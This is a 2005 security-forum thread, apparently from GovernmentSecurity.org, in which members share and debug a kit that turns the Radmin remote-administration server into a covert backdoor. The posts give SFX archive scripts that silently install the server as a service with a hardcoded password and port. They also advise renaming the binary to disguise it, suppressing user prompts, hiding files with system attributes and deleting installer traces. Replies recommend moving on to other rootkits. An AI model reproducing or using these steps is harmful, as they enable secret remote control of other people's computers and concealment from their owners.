Articles

Metasploit Framework Windows Tutorial
Remote Desktop Connection
Windows Processes That May Be Dangerous
How-To use NetCat a Tutorial
Common Linux Commands
Common Ports
Netcat Commands
HTTP Response Codes
War-Google Hack Terms
Wardriving
Avoiding Social Engineering and Phishing Attacks
Intrusion Detection on Linux
Linux Intrusion Detection
Penetration Testing Guide
Penetration Testing Tools
Social Engineering Fundamentals, Part I: Hacker Tactics
Social engineering (computer security)
The Psychology of Social Engineering

The Archives

General GSO
GovernmentSecurity.org News & Suggestions
In The News
Open Topic
General Security Information
Trash Can
Exploit & Vulnerability Mailing List Archives
Trial Member Forum
Product and Program Reviews GSO Tutorials
System Security
Windows Systems
Beginners Section
Linux & Unix Systems
File Downloads
Exploit Research & Discussion Trojan & Virus Errata
Networking Security / Firewall / IDS / VPN / Routers
System Hardening
E-Mail Security
Wifi Security
Trial Member Uploads
Upload discovered Trojans & Mal ware
GSO Programming Section
C , C++ , VC++
Visual Basic.NET
Perl /CGI
Java/Javascript
PHP/XML/ASP/HTML
Assembly + Other
The Cork Board
Network Security Consultant Directory
Network Security Jobs
The Archives
Encryption Information
General Network Security
Internet Anonymity
HTTP Protocol Security
Linux Security
MS IIS Information
Exploit Articles
Programming / Tool Design
GSO Software Projects
Public Downloads
Microsoft Security Questions and Papers
Help - Search - Member List - Calendar
GovernmentSecurity.org > System Security > Trial Member Uploads
Insanity
Jun 26 2005, 08:30 PM
Simple Radmin Rootkit
Written By Insanity

Alright this is a way of making a rootkit with the radmin server.
There are to files in the rar. there is Radmin.exe and Radmin2.exe

These programs are quite simple to make and doens't take much will power to do eather.

*NOTE, with both files you need Admdll.dll and raddrv.dll because they are mandatory dll's that you need to run the r_server service

CODE

Radmin.exe

Okay for radmin.exe this is what you can do, you get your files r_server, Admdll.dll, raddrv.dll and Radmin.reg

(*Note, to get radmin.reg with the settings you want you have to install the server on your computer first and then grab the settins from the registry)

So for the default registry in radmin.exe they tray icon is disabled and has a default password and port.

So you make a .rar (Using Winrar) and in the comments your going to want to put

Path=NetMeeting
SavePath
Setup=regedit.exe /s Radmin.reg
Setup=r_server.exe /pass:Insanity /port:60023 /install /silence
Setup=r_server.exe /start
Silent=1
Overwrite=2

For path=netmeeting that means that it is going to install in the programfiles netmeeting folder.

Save Path is just so everything that u execute after that is taking place there

Setup=regedit.exe /s Radmin.exe silently adds your registry files that you got

Setup=R_server.exe /pass:Insanity /port:60023 /silence, Okay This is a Big thing, If you setup your registry file with the password port you want then you can use that instead of this step and that way your password and port will be encrypted and you can completely forget that step altogether

Setp=r_server.exe /start starts up the program

Silent=1 keeps everything silent and Overwrite=2 will overwrite anything that is already in that folder.


Radmin2.exe
CODE

Radmin2.exe is basically the exact same but doenst have a radmin.reg because it just uses the dfault settings and then saves the password and port via Setup=win32.exe /pass:Insanity /port:60023 /save /silence
and make sure u do
Setup=win32.exe /install /silence
(That /install is important because that installs it as a service as opposed to jsut running it)

This way is simpler but your pasword etc are not encrypted.

R_server.exe is renamed to win32.exe and can be renamed to anything you want to make it less obvoius of what it is :)


There are ways to spice this up using bat files and hct and masking a service name etc but you can figure out how to do that youself..

good luck

Edit* Can you please move this into the right sectoin if this isn't the right place to put it smile.gif thank you
dissolutions
Jun 27 2005, 07:55 AM
Haven't looked at the attachments but generally looks like you've got the post down pretty good,

and it is in the right forum. will keep an eye on you and advise you if your in the wrong section no need to worry about it, we don't usually get nasty for misposting tongue.gif
Insanity
Jun 27 2005, 08:24 AM
alright, well deeply appreciated for imforming me of that. haha dont wan't anyone mad at me smile.gif
sin2oo5
Jun 27 2005, 05:08 PM
hey dude, i was just looking for something like that, but both executeables dont seem to work for me, i just tested them in my testlab sad.gif

the radmin2.exe gives a error message (admdll missing, and thats strange cuz these one is included in the rar archive right?)

the radmin.exe is just running but doesnt start the r_server.exe....
Insanity
Jun 27 2005, 11:18 PM
ii dont know what is wrong with radmin2.exe and for the radmin.exe try going start=radmin.bat /s

in the bat you can put
@echo off
net start r_server
net stop r_server
.
..
...
....
...
..
.
net start r_server

it should start then.. all of the dots are just cause im bored... if you could put like a 10 second delay time inbetween there (Not sure how, google it!) then it should start up the way you want... (PLUS, try making your own registry, thats the easist way to do it smile.gif

also if you want to clean up your tracks so people dont know waht service your starting just do a
del <file's you want> and they will be gone so.....
del radmin.bat
del radmin.reg
del radmin.exe (NOTE, note the R_SERVER.exe and then you will have only the nessicary files you need and people wont be able to steal your stuff as easily smile.gif
cloud9ine
Jun 28 2005, 04:56 AM
try this:

CODE
@echo off
regedit.exe /s Radmin.reg
remote.exe /install /silence
remote.exe /pass:infinity /port:5555 /save /silence
remote.exe /start
attrib +r +a +s AdmDll.dll
attrib +r +a +s raddrv.dll
attrib +r +a +s remote.exe
del /f Radmin.reg
echo ooooo > install.bat



Also, when creating the SFX, make sure to change the advanced options to not prompt the user ph34r.gif , and to run install.bat after extraction biggrin.gif


edit: I believe the reason the SFX you uploaded did not work is because it contained r_server.exe instead of remote.exe cool.gif
Serhat
Jun 28 2005, 04:58 AM
<removed some lines.. didn't read it properly I guess>
only thing I don't like is... well it's too easy to read the content of the SFX 'script'..

QUOTE(cloud9ine @ Jun 28 2005, 04:56 AM)
edit: I believe the reason the SFX you uploaded did not work is because it contained r_server.exe instead of remote.exe  cool.gif
*



That's because he uses r_server.exe in the SFX script as well.. and not remote.exe

Serhat
Insanity
Jun 28 2005, 07:38 AM
lol, whats the difference between r_server and remote.exe?
if you say just the name then
QUOTE
I believe the reason the SFX you uploaded did not work is because it contained r_server.exe instead of remote.exe

is Irrelavent smile.gif


but yeah... i guess i could upload a couple workign proggies... but i kinda like the idea of them having minor bugs because then it gives people the chance to learn from the info we have given them and to fix it themselves that way they can make it themselves next time...

hehe but yeah mine runs with hct.exe(the undetected one) cause i like the service starting and stopping and i plan to incorperate the service daemon so it changes the service name smile.gif
kuki
Jun 29 2005, 07:48 AM
nice rootkit coded by You rolleyes.gif but imho you can find all these files in normall official radmin installation directory huh.gif and read about "sneaky" way to execute on "help.hlp" file from da dir :x

thanks anyway wink.gif <= this is *NO* thx post tongue.gif

BN Says: OK! wink.gif <= this is *NO* warning post tongue.gif
Insanity
Jul 2 2005, 10:37 PM
it doenst have to be help.hlp it can be any file and you can do that with a bunch of differen't ways to do that... not just with rootkits ... but yeah thanks for the pointer anyways
Majika
Jul 27 2005, 05:33 PM
QUOTE(Insanity @ Jun 28 2005, 12:18 AM)
also if you want to clean up your tracks so people dont know waht service your starting just do a
del <file's you want> and they will be gone so.....
del radmin.bat
del radmin.reg
del radmin.exe (NOTE, note the R_SERVER.exe and then you will have only the nessicary files you need and people wont be able to steal your stuff as easily smile.gif
*




That is what I have been seeing in other example kits of this kind. I have also been making these kits partly from other examples and from reading up post like your's. I am curious about the 'del' command what does it mead and where can I find out more about it....

I mean a proper explanation about its functions and prehaps how to impliment it in a working script of my own.

Does the 'del' command work the same as the 'START' command..

other that that Insane your radmin rewtkit is a fine example wink.gif

click
Jul 27 2005, 09:25 PM
QUOTE(Majika @ Jul 27 2005, 05:33 PM)
I am curious about the 'del' command what does it mead and where can I find out more about it....

I mean a proper explanation about its functions and prehaps how to impliment it in a working script of my own.

Does the 'del' command work the same as the 'START' command..
*



blink.gif really??? you have A LOT to learn! but, I will still try to help you out on this one...

You might want to do a ton of reading from the following sites, in the order they are listed...
h**p://83.67.55.228/page8.htm <-- overall MSDOS tutorial
h**p://www.lagmonster.org/docs/DOS7/ <-- command listing, including information on the elusive "del" command! ph34r.gif
h**p://home7.inet.tele.dk/batfiles/ <-- information on Batch File Programming (this is what you seem to want to be able to do, but you need to read the links above first... sooo much to learn! lol)

Eventually, you will find out that Batch File Programming is EXTREMELY limited (pretty useless), but is not only a good start, but also an invaluable resource for advanced hacking (for example, with most buffer overflows). I suggest that you eventually start looking into Perl, C++, and eventually ASM. Good luck!

NOTE: just incase you are clicking on the links, and you find they don't work... just copy the link into the address box, and change h**p to http... i really hope you knew this!
tweakz20
Jul 28 2005, 03:44 AM
well, I'm not sure you coded this rootkit as I have seen about 3 dozen (inlcuding one by me) of these laying around. The best way to make a rootkit out of radmin is to actually go in and hex edit the values. Overall I like the concept and it is a good first go at a rootkit.

For you're next project...I would suggest trying to make a HxDef modded kit ot a FU Rootkit mod smile.gif

Also for further reading: www.rootkit.com <--very good knowledge DB.

Cheers, smile.gif
Insanity
Jul 29 2005, 05:44 AM
lol i know all about hxdef and have rootkits made but i am trying to make it just for the purpose of introducing basic rootkit's to member's that don't even know that... Btw i did hex edit the values in the first one... it hink but yeah i actually coded this rootkit... but wow 3 dozen... yeah i've prob seen around 150 of those type's of rootkits bouncin around and yeah its quite interesting... i think the best way is to find kits that hackers have left and disect them and learn that way.. thats what i tend to do for basic root kits , but as for the undecting and what not i leave that up to c and hex edit like you said
tibbar
Jul 31 2005, 12:08 AM
is this the 30 day timeout version of radmin? if not please remove the attachment since this is a commercial product.
Insanity
Aug 16 2005, 06:58 AM
yes it is a 30day trial versoin dont worry smile.gif
Skunky88
Aug 17 2005, 02:44 AM
tried to get it startet with radmin2 but it starts a radmin with ntauth on my testing win2k system! someone knows whats the problem?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2005 Invision Power Services, Inc.